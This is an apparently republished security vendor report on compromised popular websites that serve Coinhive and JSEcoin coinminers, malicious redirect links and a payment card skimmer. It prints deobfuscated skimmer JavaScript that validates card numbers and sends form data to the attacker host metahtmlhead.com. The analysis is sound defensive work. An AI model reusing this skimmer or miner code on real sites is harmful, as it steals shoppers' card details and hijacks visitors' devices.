Executive Summary
Unit 42 recently launched a threat hunting campaign among the top 10,000 websites globally on Alexa. Alexa rankings are a measure of website popularity, based on visitor interactions and number of visits. We found four sites that were affected, as outlined in Table 1. In the analysis that follows, we describe the malicious activity in more detail, covering malicious coinminers, which hijack CPU resources to mine cryptocurrency; malicious external links, which direct users to malicious sites; and a web skimmer attack, which is designed to steal payment card details from checkout forms.
Table 1. Summary of affected top Alexa sites.
Palo Alto Networks customers are protected from the aforementioned threats by the URL Filtering and Threat Prevention cloud-delivered security subscriptions.
Compromised Sites
Malicious Coinminers
Coinhive was a browser mining service that offered a JavaScript miner for the Monero blockchain. It shut down in March 2019, in part because it was widely abused by cybercriminals. There are two websites still serving Coinhive’s miner script. One is coinhive.min.js and the other is JSEcoin. Figure 1, below, shows the commands issued to start the coinminer on a compromised website – zoombangla[.]com.
Figure 1. Commands to start the Coinhive miner with defined parameters.
This miner can control how it utilizes the user’s CPU and how many threads it uses for mining. The coinminer can also control how much of a target’s CPU it’s using. The available options for parameters are shown in Table 2. Oddly, the above codes configured the miner to rapidly drain the battery of an infected device, perhaps because the attackers felt a need to make the most use possible of any successfully compromised victims. Most attackers ensure a compromised device’s power usage stays low to avoid detection and continue making money illicitly. However, in this case, it appears the attackers rushed to mine and did not configure it correctly.
Table 2. Parameter throttle and CPU usage map.
Another example of the commands to start the Coinhive mining script is shown below, from a different website we found serving it – pojoksatu[.]id.
Figure 2. Commands to start the Coinhive miner with default parameters.
Once a user visits either of the above sites, the coinmining script would automatically run and start mining for the attacker. The user’s CPU load would increase as shown in Figure 3.
Figure 3. CPU load activity
Overall, we found more than 60 URL pages injected with Coinhive mining scripts in pojoksatu[.]id and zoombangla[.]com. Details are in the Appendix.
Malicious External Links
External link security has become increasingly important. As email services have improved at spotting spam and other types of malicious messages, attackers are using open redirects with external links instead. If attackers publish a malicious URL in a post on a legitimate website, likely very few visitors would find it suspicious. If users click on the link – or even hover over it to check it first – they will see the valid website in the link, but they will end up at a malicious site the attacker wants to redirect them to. The user would then be infected with some sort of malware, such as a malicious coinminer, or their personal information may be stolen.
Figure 4 is a legitimate used car website on libero[.]it where you can search and compare vehicles.
Attackers inserted malicious links into car advertisements, which redirected visitors interested in the vehicle to a malicious site that injected them with the JSEcoin coinmining script, as shown in Figures 5-7. Please note that the JSEcoin platform closed down on April 4, 2020. The scripts will still run, but the attackers aren’t able to collect coins from it anymore.
Figure 4. External link in libero[.]it, which would redirect visitors to compromised sites.
The source page would look like this:
Figure 5. Source codes of the page containing malicious links.
As you can see in Figure 5, all the external links, which are highlighted, point to libero[.]it. If you want to know more about the car, you would need to click the link. Then you would be redirected to the malicious site.
Figure 6. Redirect chain.
This site is where the malicious coinminer is injected.
Figure 7. Commands to start the JSEcoin miner.
Web Skimmer
A web skimmer attack, also known as e-skimming or Magecart attacks, are a type of attack where a payment page on a website is compromised and injected with malicious code in order to steal payment card details when they are entered into checkout forms.
The example we found among top-ranked websites on Alexa stems from another external link security issue. heureka[.]cz itself is an online shopping website. If you search Anti-COVID products (which are the top search keywords on the website) on the site, it will show a list of related products.
Figure 8. Product example.
There is one store listed after this product, and you can choose to buy from this store.
Figure 9. Link in heureka[.]cz to compromised sites.The source page looks like this:
Figure 10. Source code of the page containing malicious links, which are highlighted.
Once you click to visit this store, you would be redirected to the malicious site.
Figure 11. Redirect chain.
And unfortunately, the entire site is full of obfuscated malicious skimmer scripts, as shown in Figure 12.
Figure 12. Obfuscated skimmer codes.
The above codes are obfuscated, making it hard to predict what behavior they cause. We had to deobfuscate the codes first. We then found the following functions, which are stealthy as they monitor a user’s input of their payment card information and send it out to the remote attacker server.
function G1ED7H(XYRUDR) {
var ZU554M = 0;
XYRUDR = XYRUDR["split"]("");
if (XYRUDR["length"] < 13 || XYRUDR["length"] > 19) return false;
for (var E9VLQF = XYRUDR["length"] - 1; E9VLQF >= 0; E9VLQF--) {
if (!XYRUDR[E9VLQF]["match"](/[0-9]/)) return false;
if (!(E9VLQF % 2)) {
ZU554M += (XYRUDR[E9VLQF] * 2 > 9) ? XYRUDR[E9VLQF] * 2 - 9 : XYRUDR[E9VLQF] * 2
} else {
ZU554M += XYRUDR[E9VLQF] * 1
}
}
return !(ZU554M % 10)
}This function is used to validate a credit card number with the Luhn Algorithm, which is widely used to validate a variety of identification numbers, such as credit card numbers.
function XYRUDR() {
var P23WTA = document['all'] || document['getElementsByTagName'](*);
for (E9VLQF = 0; E9VLQF < P23WTA['length']; E9VLQF++) { if (".input.select.form.button.a.img."["indexOf"]("." + P23WTA[E9VLQF]["tagName"]["toLowerCase"]() + ".") >= 0 && !P23WTA[E9VLQF]["r"+Math["random"]()]) {
P23WTA[E9VLQF]["r"+Math["random"]()] = 1;
XCT5WY(P23WTA[E9VLQF], "mousedown");
}
setTimeout(XYRUDR, 99)
}This is the beginning of the skimmer. It would run every 99 seconds to call the function XYRUDR. Function XYRUDR would find all the tags in [input, select, form, button, a, img].
function XCT5WY(P23WTA, "mousedown") {
P23WTA["addEventListener"] ? P23WTA["addEventListener"](""mousedown", GB14BD, false) : P23WTA["attachEvent"]("onmousedown", GB14BD)
}It would set the “mousedown” event listener for the aforementioned tags.
function GB14BD() {
var P23WTA = document["all"] || document["getElementsByTagName"]("*");
E9VLQF, N798NL = "", E;
ITCHLA = "";
for (E9VLQF = 0; E9VLQF < P23WTA["length"]; E9VLQF++) { if (".input.select."["indexOf"]("." + P23WTA[E9VLQF]["tagName"]["toLowerCase"]() + ".") >= 0 && P23WTA[E9VLQF]["value"]) {
if (G1ED7H(P23WTA[E9VLQF]["value"]["split"](" ")["join"](""))) {
ITCHLA = P23WTA[E9VLQF]["value"]["split"](" ")["join"]("");
}
N798NL += & + (P23WTA[E9VLQF]["name"] || P23WTA[E9VLQF]["id"] || "i_" + E9VLQF) + "=" + CVZLRD(P23WTA[E9VLQF])
}
}
if (ECUOWQ != N798NL && ITCHLA) {
ECUOWQ = N798NL;
MAU1KL()
}
}Once the event triggers, it would call this function to get the value of the tag.
function MAU1KL() {
var ZU554M = "https://";
Y3V4T2 = String;
ZU554M += "metahtmlhead.com" + "/" + "folder" + "/" + "ip" + "/" + "zxc" + "." + "php";
var P23WTA = document["createElement"]("script");
N798NL = document["getElementsByTagName"]("html")[0];
P23WTA = N798NL["insertBefore"](P23WTA, null);
P23WTA["src"] = ZU554M + "?r=" + MLEMCG + ECUOWQ + "&" + "c" + "c" + "=" + ITCHLA
}This function is used to send credit card information out to the collection server.
To recap, the skimmer work flow is:
Add event listener for [input, select, form, button, a, img].
When a number string passes credit card validation checks, it sends the information out.
Construct the collection server URL and parameters, then send the information out.
A successful attack would send all the user information to the remote attacker server, including credit card number, address, etc.
Collection Server: metahtmlhead[.]com
Figure 13. Credit card information being sent to the collection server.
URL Filtering Analysis
Figure 14. URL Filtering customer geolocation distribution.
This figure shows the general geographic distribution of visits to the affected sites that we observed. While most visitors clearly came from Western Europe, visitors from the Eastern U.S. and Western U.S. are not far behind. This graph indicates a broad spectrum of potential victims all across the globe.
Conclusion
Our research highlights that users need to exercise caution, even when visiting popular, apparently reputable websites. These are the same sites likely to generate the most income for attackers focused on malicious coinmining and web skimming. When users click a link away from a core site, they should pay attention to the full URL of the site where they end up to ensure it’s where they expected to be. A simple way to avoid malicious coinminers is to have your browser and system fully patched with endpoint security installed.
Source: paper.li